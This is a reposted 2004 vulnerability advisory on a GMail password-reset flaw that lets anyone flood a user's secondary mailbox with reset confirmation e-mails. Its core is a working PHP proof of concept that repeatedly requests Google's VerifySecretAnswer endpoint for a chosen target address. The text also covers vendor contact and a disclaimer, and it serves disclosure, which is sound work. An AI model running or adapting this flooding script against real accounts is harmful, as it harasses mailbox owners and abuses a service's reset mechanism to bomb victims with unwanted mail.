[转载]GMail E-Mail Bomber邮件炸弹原理分析
信息来源:securitytracker.com---------------------------------------------------------------------------
GMail E-Mail Bomber
---------------------------------------------------------------------------
Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GMail - Gmail is an experiment in a new kind of webmail, built on the
idea
that you should never have to delete mail and you should always be able
to
find the message you want
Web : [url]http://gmail.google.com[/url]
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
A. E-Mail Bomber
The problem is the following : If any gmail user forgots the password
he/she
can answer a question or send to her/sher secondary e-mail addresses a
password
reset confirmation e-mail. Well, with GMail we can flood the secondary
box of GMail users.
I wrote a very basic Proof Of Concept in PHP :
<?php
/******************************************
*
* GMail bomber Proof Of Concept
* Date time : Sun. Sep-26-2004
* Author : Jose Antonio Coret
* E-Mail :
* [email]joxeankoret@yahoo.es[/email]
* [email]joxean.piti@gmail.com[/email]
*
******************************************/
$gmail_account = "[email]any.gmail.address@gmail.com[/email]";
$google_cgi =
"[url]https://www.google.com/accounts/VerifySecretAnswer[/url]";
$google_cgi_params =
"?continue=http://gmail.google.com/gmail&service=mail&Email=
$gmail_account&SendEmail=true&IdentityAnswer=";
$emails_to_send = 15;
$bomber_url = "$google_cgi$google_cgi_params";
echo("GMail bomber\n");
echo("P.O.C. provided by Jose Antonio Coret (Joxean Koret)\n
\n");
echo("Starting flood against $gmail_account ... \n\n");
for ($i = 0;$i<$emails_to_send;$i++)
{
echo("Sending e-mail number " . ($i + 1) . " ... ");
$fd = fopen($bomber_url, "r");
fclose($fd);
echo("Ok.\n");
}
echo("\n");
echo("Finish...\n");
?>
The fix:
~~~~~~~~
The vendor was contacted on Sun, 26 Sep 2004 21:11:55 but the problem
still
continues unfixed at Sun, 26 Dec 2004.
Disclaimer:
~~~~~~~~~~~
The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<
dot>>>>>es
页:
[1]